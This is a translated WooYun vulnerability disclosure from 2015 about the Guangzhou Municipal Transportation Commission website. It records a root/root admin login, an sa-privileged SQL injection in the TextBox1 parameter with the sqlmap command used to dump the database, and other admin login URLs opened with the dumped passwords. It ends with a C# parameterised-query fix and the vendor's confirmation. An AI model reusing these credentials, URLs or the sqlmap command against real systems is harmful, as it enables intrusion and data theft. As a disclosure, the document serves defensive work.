
Vulnerability summary

Defect ID: wooyun-2015-0131570

Title: Guangzhou Municipal Transportation Commission has SQL injection and a weak admin-backend password (large-scale disclosure of password data)

Vendor: Guangzhou Municipal Transportation Commission (广州市交通委员会)

Author: ㄚ冷的微笑

Submitted: 2015-08-05 15:45

Fixed: 2015-09-20 11:06

Published: 2015-09-20 11:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: Handed over to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-08-05: Details sent to the vendor, awaiting vendor handling
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and relevant domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public

Brief description:

1. The Guangzhou Municipal Transportation Commission site has a SQL injection running with sa privileges; the database can be dumped in full and contains multiple backend admin passwords.
2. Weak backend admin password.

Detailed description:

http://www.gzjt.gov.cn

[Screenshot: back1.jpg]


After logging into the admin backend with the weak password, I found a SQL injection in the backend, dumped the database, and found account credentials for several other backends in it.

Proof of vulnerability:

1. Found a weak password on the Chunyun (Spring Festival travel) admin backend: root/root logs in.
http://www.gzjt.gov.cn/ChunYun/System/Login.aspx

[Screenshots: back2.jpg, back3.jpg]


2. Found a SQL injection in the backend

[Screenshot: sql1.jpg]


The POST parameter TextBox1 is vulnerable to SQL injection. The database login is sa, so the entire database can be dumped, and it contains the passwords for other admin interfaces.
http://www.gzjt.gov.cn:80/ChunYun/System/Module/News/News_List.aspx?Type_ID=2
(POST)


sqlmap.py -r www.gzjt.gov.cn_ChunYun.txt -p TextBox1 -v 3  --dbms=mssql


[Screenshots: sql2.jpg, sql3.jpg, sql4.jpg, sql5.jpg, sql7g.jpg]


3. Found several other admin backend URLs; the passwords obtained through the SQL injection allow login to them:
http://www.gzjt.gov.cn/gzjt/Admin/Login.aspx
http://www.gzjt.gov.cn/gzjtsdljweb/Admin/Login.aspx
http://www.gzjt.gov.cn/gcxxweb/Admin/Login.aspx

[Screenshot: sql6.jpg]

Fix recommendation:

The experts understand this better than I do.
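As an added illustration of the fix (this is example code written for this page, not the site's own code): the report only shows the request, so the data-access pattern below is an assumption consistent with the symptoms, a search box value (TextBox1) concatenated into a SQL Server query executed as sa. The class, table, column names and connection string are all hypothetical.

```csharp
// Added example, not the site's code: the report shows only the request, so the
// data-access pattern below is an assumption consistent with the symptoms
// (TextBox1 concatenated into a SQL Server query run as sa).
using System;
using System.Data;
using System.Data.SqlClient;

public static class NewsSearch
{
    // Hypothetical connection string; a real deployment reads it from config.
    // Note the dedicated low-privilege login instead of sa.
    private const string ConnStr =
        "Server=(local);Database=ChunYun;User Id=news_reader;Password=<placeholder>;";

    // Vulnerable pattern: the search text becomes part of the SQL statement,
    // so a quote in TextBox1 rewrites the query. Executed under sa, the whole
    // server, not just the news table, is reachable from this one text box.
    public static DataTable SearchVulnerable(string title, string typeId)
    {
        string sql = "SELECT ID, Title, WriteDate FROM News WHERE Type_ID = " + typeId
                   + " AND Title LIKE '%" + title + "%'";
        using (var conn = new SqlConnection(ConnStr))
        using (var da = new SqlDataAdapter(sql, conn))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Hardened: parameterised query, typed Type_ID, and user-supplied LIKE
    // wildcards escaped so input can neither change the statement nor widen
    // the match. Pair it with a login that has SELECT on the news tables only.
    public static DataTable SearchSafe(string title, int typeId)
    {
        const string sql = "SELECT ID, Title, WriteDate FROM News "
                         + "WHERE Type_ID = @typeId AND Title LIKE @pattern ESCAPE '\\'";
        string escaped = title.Replace("\\", "\\\\").Replace("%", "\\%")
                              .Replace("_", "\\_").Replace("[", "\\[");
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@typeId", SqlDbType.Int).Value = typeId;
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
            using (var da = new SqlDataAdapter(cmd))
            {
                var dt = new DataTable();
                da.Fill(dt);
                return dt;
            }
        }
    }
}
```

The weak root/root credential on the Chunyun login page is a separate issue: rotate every admin password found in the dump, since the dumped database exposed credentials for the other backends listed above.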

Copyright notice: when reposting, please credit the source: ㄚ冷的微笑@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-08-06 11:05

Vendor reply:

Thank you very much for your report.
The issues in the report have been confirmed and reproduced.
Affected data: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 12
We are contacting the responsible site administration unit to handle it.

Latest status:

None yet